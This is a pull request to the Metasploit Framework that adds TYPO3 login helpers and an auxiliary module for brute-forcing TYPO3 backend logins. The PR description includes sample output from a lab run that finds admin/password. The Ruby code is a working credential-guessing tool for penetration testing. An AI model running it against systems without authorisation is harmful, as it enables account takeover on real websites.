### PR TITLE
Typo3 Bruteforcer

### DIFF
--- a/lib/msf/core.rb
+++ b/lib/msf/core.rb
@@ -59,6 +59,7 @@ require 'msf/core/post'
 
 # Custom HTTP Modules
 require 'msf/http/wordpress'
+require 'msf/http/typo3'
 
 # Drivers
 require 'msf/core/exploit_driver'

--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -312,6 +312,14 @@ module Exploit::Remote::HttpClient
     end
   end
 
+  # Returns the complete URI including the scheme and host
+  def full_uri
+    uri_scheme = ssl ? 'https' : 'http'
+    # check if target_uri starts with a /
+    uri = target_uri.to_s =~ /^\// ? target_uri : "/#{target_uri}"
+    "#{uri_scheme}://#{rhost}#{uri}"
+  end
+
   #
   # Returns a modified version of the URI that:
   # 1. Always has a starting slash
@@ -341,6 +349,13 @@ module Exploit::Remote::HttpClient
       print_error "Invalid URI: #{uri}"
       return nil
     end
+  end
+
+  # removes HTML tags from a provided string.
+  # The string is html-unescaped before the tags are removed
+  # Leading whitespaces and double linebreaks are removed too
+  def strip_tags(html)
+    Rex::Text.html_decode(html).gsub(/<\/?[^>]*>/, '').gsub(/^\s+/, '').strip
   end
 
   #

--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -312,12 +312,12 @@ module Exploit::Remote::HttpClient
     end
   end
 
-  # Returns the complete URI including the scheme and host
+  # Returns the complete URI as string including the scheme, port and host
   def full_uri
     uri_scheme = ssl ? 'https' : 'http'
-    # check if target_uri starts with a /
-    uri = target_uri.to_s =~ /^\// ? target_uri : "/#{target_uri}"
-    "#{uri_scheme}://#{rhost}#{uri}"
+    uri_port = rport.to_s == '80' ? '' : ":#{rport}"
+    uri = normalize_uri(target_uri.to_s)
+    "#{uri_scheme}://#{rhost}#{uri_port}#{uri}"
   end
 
   #

--- a/lib/msf/http/typo3.rb
+++ b/lib/msf/http/typo3.rb
@@ -1,0 +1,25 @@
+# -*- coding: binary -*-
+
+# This module provides a way of interacting with typo3 installations
+module Msf
+  module HTTP
+    module Typo3
+      require 'msf/http/typo3/login'
+      require 'msf/http/typo3/uris'
+
+      include Msf::Exploit::Remote::HttpClient
+      include Msf::HTTP::Typo3::Login
+      include Msf::HTTP::Typo3::URIs
+
+      def initialize(info = {})
+        super
+
+        register_options(
+            [
+                Msf::OptString.new('TARGETURI', [true, 'The base path to the typo3 application', '/']),
+            ], HTTP::Typo3
+        )
+      end
+    end
+  end
+end

--- a/lib/msf/http/typo3/login.rb
+++ b/lib/msf/http/typo3/login.rb
@@ -1,0 +1,97 @@
+# -*- coding: binary -*-
+module Msf::HTTP::Typo3::Login
+
+  # performs a typo3 backend login
+  #
+  # @param user [String] Username
+  # @param pass [String] Password
+  # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
+  def typo3_backend_login(user, pass)
+    # get login page for RSA modulus and exponent
+    res_main = send_request_cgi({
+                                    'method' => 'GET',
+                                    'uri' => typo3_url_login
+                                })
+    if res_main and res_main.code == 200
+      e = res_main.body.match(/<input type="hidden" id="rsa_e" name="e" value="(\d+)" \/>/)[1]
+      n = res_main.body.match(/<input type="hidden" id="rsa_n" name="n" value="(\w+)" \/>/)[1]
+      vprint_status("e: #{e}")
+      vprint_status("n: #{n}")
+      rsa_enc = typo3_helper_login_rsa(e, n, pass)
+      vprint_status("RSA Hash: #{rsa_enc}")
+      # make login request
+      vars_post = {
+          'n' => '',
+          'e' => '',
+          'login_status' => 'login',
+          'userident' => rsa_enc,
+          'redirect_url' => 'backend.php',
+          'loginRefresh' => '',
+          'interface' => 'backend',
+          'username' => user,
+          'p_field' => '',
+          'commandLI' => 'Login'
+      }
+      res_login = send_request_cgi({
+                                       'method' => 'POST',
+                                       'uri' => typo3_url_login,
+                                       'cookie' => res_main.get_cookies,
+                                       'vars_post' => vars_post,
+                                       'headers' => {'Referer' => full_uri}
+                                   })
+      if res_login
+        if res_login.body =~ /<!-- ###LOGIN_ERROR### begin -->(.*)<!-- ###LOGIN_ERROR### end -->/im
+          print_error(strip_tags($1))
+          return nil
+        elsif res_login.body =~ /<p class="t3-error-text">(.*?)<\/p>/im
+          print_error(strip_tags($1))
+          return nil
+        else
+          cookies = res_login.get_cookies
+          return cookies if typo3_admin_cookie_valid?(cookies)
+          return nil
+        end
+      end
+    else
+      print_error('Can not reach login page')
+      return nil
+    end
+
+    return nil
+  end
+
+  # verifies cookies by calling the backend and checking the response
+  #
+  # @param cookiestring [String] The http cookies as a concatenated string
+  # @return [Boolean] true if the cookie is valid, false otherwise
+  def typo3_admin_cookie_valid?(cookiestring)
+    res_check = send_request_cgi({
+                                     'method' => 'GET',
+                                     'uri' => typo3_url_backend,
+                                     'cookie' => cookiestring,
+                                     'headers' => {'Referer' => full_uri}
+                                 })
+    return true if res_check and res_check.code == 200 and res_check.body and res_check.body =~ /<body [^>]+ id="typo3-backend-php">/
+    return false
+  end
+
+  private
+
+  # encrypts the password with the public key for login
+  #
+  # @param e [String] The exponent extracted from the login page
+  # @param n [String] The modulus extracted from the login page
+  # @param password [String] The clear text password to encrypt
+  # @return [String] the base64 encoded password with prefixed 'rsa:'
+  def typo3_helper_login_rsa(e, n, password)
+    key = OpenSSL::PKey::RSA.new
+    exponent = OpenSSL::BN.new e.hex.to_s
+    modulus = OpenSSL::BN.new n.hex.to_s
+    key.e = exponent
+    key.n = modulus
+    enc = key.public_encrypt(password)
+    enc_b64 = Rex::Text.encode_base64(enc)
+    "rsa:#{enc_b64}"
+  end
+
+end

--- a/lib/msf/http/typo3/uris.rb
+++ b/lib/msf/http/typo3/uris.rb
@@ -1,0 +1,18 @@
+# -*- coding: binary -*-
+module Msf::HTTP::Typo3::URIs
+
+  # Returns the Typo3 Login URL
+  #
+  # @return [String] Typo3 Login URL
+  def typo3_url_login
+    normalize_uri(target_uri.path, '/typo3/', 'index.php')
+  end
+
+  # Returns the Typo3 backend URL
+  #
+  # @return [String] Typo3 Backend URL
+  def typo3_url_backend
+    normalize_uri(target_uri.path, '/typo3/', 'backend.php')
+  end
+
+end

--- a/lib/msf/http/typo3/uris.rb
+++ b/lib/msf/http/typo3/uris.rb
@@ -5,14 +5,14 @@ module Msf::HTTP::Typo3::URIs
   #
   # @return [String] Typo3 Login URL
   def typo3_url_login
-    normalize_uri(target_uri.path, '/typo3/', 'index.php')
+    normalize_uri(target_uri.path, 'typo3', 'index.php')
   end
 
   # Returns the Typo3 backend URL
   #
   # @return [String] Typo3 Backend URL
   def typo3_url_backend
-    normalize_uri(target_uri.path, '/typo3/', 'backend.php')
+    normalize_uri(target_uri.path, 'typo3', 'backend.php')
   end
 
 end

--- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb
@@ -39,11 +39,11 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     each_user_pass { |user, pass|
-      enum_user(user,pass)
+      try_login(user,pass)
     }
   end
 
-  def enum_user(user, pass)
+  def try_login(user, pass)
     vprint_status("#{peer} - Trying username:'#{user}' password: '#{pass}'")
     cookie = typo3_backend_login(user, pass)
     if cookie

--- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'

--- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb
@@ -1,0 +1,68 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::HTTP::Typo3
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+        'Name'		   => 'Typo3 Login Bruteforcer',
+        'Description'	=> 'This module attempts to bruteforce Typo3 logins.',
+        'References'  =>
+            [
+                [ 'URL', 'http://typo3.org/' ]
+            ],
+        'Author'		 => [ 'Christian Mehlmauer <FireFart[at]gmail.com>' ],
+        'License'		=> MSF_LICENSE
+    )
+  end
+
+  def run_host(ip)
+    print_status("Trying to bruteforce logins on #{ip}")
+
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'	 => target_uri
+    })
+
+    unless res
+      print_error("#{ip} seems to be down")
+      return
+    end
+
+    each_user_pass { |user, pass|
+      enum_user(user,pass)
+    }
+  end
+
+  def enum_user(user, pass)
+    vprint_status("#{peer} - Trying username:'#{user}' password: '#{pass}'")
+    cookie = typo3_backend_login(user, pass)
+    if cookie
+      print_good("#{peer} - Successful login '#{user}' password: '#{pass}'")
+      report_auth_info(
+          :host   => rhost,
+          :proto => 'http',
+          :sname  => 'typo3',
+          :user   => user,
+          :pass   => pass,
+          :target_host => rhost,
+          :target_port => rport
+      )
+      return :next_user
+    else
+      vprint_error("#{peer} - failed to login as '#{user}' password: '#{pass}'")
+      return
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
 
     res = send_request_cgi({
       'method'  => 'GET',
-      'uri'	 => target_uri
+      'uri'	 => target_uri.to_s
     })
 
     unless res


### PR DESCRIPTION
This PR adds the typo3 login method and a sample bruteforce script. This should be the initial work for other typo3 exploits.

Output with VERBOSE=true:

```
msf auxiliary(typo3_bruteforce) > run

[*] Trying to bruteforce logins on 192.168.18.135
[*] 192.168.18.135:80  - [1/3] - Trying username:'admin' password: ''
[*] e: 10001
[*] n: E7DE2602D917B46DA0EAE022A220D25228281FF9EDB7C554099AA5DF7FA9944ACB235A689F36ED30D295C7407375AE60D886E71502BCE18517A1269D43C8EBC296E3C25F1A828A4D12D1FDCA16A1C4F5A536A19374654DB7BEC53C690AD44A3DE405E5164A55A77E29C278EE60BE14BEFFC37594BE1A2FAB09C4A57DF69E7DBF55791EE819FDF2D34640CEE5A369EA00D912E93C892DC0B56C15D50C9594B20C6EE683C33BE19B530B721577C331AA3F9EB60A671E2AAB4257FD71E7E60F8F1865005108D27A7B299AB41570009F04F70CCBA2CFEFACFA9C3CCA2580AA50C102C5E807A5EB48022C858DA0D24C1F3EB24A0D3934696B7CE6DB1160708627110D
[*] RSA Hash: rsa:E0CBw9Z7BOSRy3R2NGWlkKCU0eoMoQcxF4PDKhNNfF8HKT7Z3o/zFQwUNvz++qkNvMth6z7isanfrXZGO1VruR86cif17Fxug1VxsLCbZBd2RSgvhq8MiLRJvP2qo+IhdAbV8ZRP+FzfbVy1AEvCj8flzGEQoWSX1763C5MwmC3CZ6324zDTWY06mlaev87/D2j+JgECIQzSjG1+EjL62y3oW1sEAdxxyVSnoaLodIfSptEto8QOYMZvzbAvKQTMawLLXqLqUIPSYNxTuz45sT4GHavxMYIBhYmKASxxkLnWt49+nrqSDJTJor944lYFiiFek0erkqWqvvdu8QEpRQ==
[-] Your login attempt did not succeed
Make sure to spell your username and password correctly, including upper/lowercase characters.
[-] 192.168.18.135:80  - [1/3] - failed to login as 'admin' password: ''
[*] 192.168.18.135:80  - [2/3] - Trying username:'admin' password: 'admin'
[*] e: 10001
[*] n: B7961E32E7C23DEE4833D19203528358206054A346E1F7C75D035ED3214C783875D7B21A8512A7D1DBF94CE8210B3D1AC73F806DA471B656646EAF28081B467AF9ACCFF5F36826035660B169A3CF7C43BD3D0D56D95E507EF5F70E7AA4B0590E8EFB1FBC94ECBCC102DEA052310ACB2CC81C245ABB2E079CB0DAC16B9383AA897EACE503EC4889E452EE5C1A4A4B4FA8D79DE417FB8FDA22F32E0E89815581397D6F11EF6E9FDBAF6754A37F48D7D73B4E1A426A4B6D9720C1FE8760A4D27383BFBC63FA7D336D16CDF50A78BD50F523EAC8C4D9DBE1661E6E85DCFE0511168C26B14EE7515C42DFEA03677EAAED227A8567753BC596F4DE6E5BA9A20ADABF95
[*] RSA Hash: rsa:ZQqnBbU8NPAQbh78zFhFAE5FvH28pPG7YrIlyEekIp1PsBAAixArTQu3FkgFJpUChzbRkcOJswrzowr2HaGifGJvzWMYge/eFXLrfWD3gXBwXY9i22t/JPQze+t+RMrjYLNO0a/Ywp+34Ih3vsiqSWfTTYnkYqxjqrvP3IcG9qXF7ivZCDM/GKFJ1L1Ox3ZkNlJWAuPcKsHqaVSXMO3CJV5DAPnTKPheF9WDCSYmvy28JGdc4Ehdwl9eEAaTaxDzAGzMoC3AUTS+lK5aE4AmA1BKAp5K/Smcg33Nsto6RtNzaPrzxlSUFH3HcH8rEQXcpUpJDmoXUjnPiiIW98Fsng==
[-] Your login attempt did not succeed
Make sure to spell your username and password correctly, including upper/lowercase characters.
[-] 192.168.18.135:80  - [2/3] - failed to login as 'admin' password: 'admin'
[*] 192.168.18.135:80  - [3/3] - Trying username:'admin' password: 'password'
[*] e: 10001
[*] n: B46984C41914BD0657D6172AA05CCC9C910D2C763CAA7E4B031CDE8C00DAFE5B1880276B2B741931A4A9F91895456F303F1A8093B436D753F55D455D7046ACBA06EB2D1CC939C3E66ECECC27810B6E32ABB23B5468274B915124EDEE736CD75DA77DE52A89ACED56A9EF053E8E605BD4FC05D3E917A82D26D75C454A32CA05EBAD9DABCB453806B035A3C942B317429158B19CEB4B9F9E704D04EE40EE7FB8DA34BEB8AC715F991959FCC326A044FABEA5C52AC5853104071A5BD64A7E618E3EB55B7496C83061A4CF66871E696A8F92FEA0E6AC735B16D880D426F5A4B87D5F3EC8291E27E9166207B8C4ADE6366059E7BE6400C79D3E8AB831DC2F1C9F96F3
[*] RSA Hash: rsa:I4t7bkvh98m7guv6AqW70gggziTUFlS3xBI4V3tOVNpzmUp0V2Fq9Zr+t4ZJlVIaUTeIpuDW6nVLh06g25SdW+EZqkHoFCYS2FKEh4nzHez0VgFYoclnxt3CSbAG2zZtVjlk/GLhPDPXYBhf2QI0S6UbYXVbeoA1iZZP3MFFKSoecyl0HoQdkFUep0v+Ehfgx7sh6u5Y9FFv5RhuXFQlt1dFMVMvEp4DRQABy32wcOjYfp9TKM9vGoODEX50hIGquQ7mhO3N5Aq6UN8wnw5Mvs9GhTgEnbWFr6nEQZdQNZhSxPKxJPjWGESiwNqR69pEqYZJVS7+Orjfyu/Gn27NZQ==
[+] 192.168.18.135:80 - Successful login 'admin' password: 'password'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
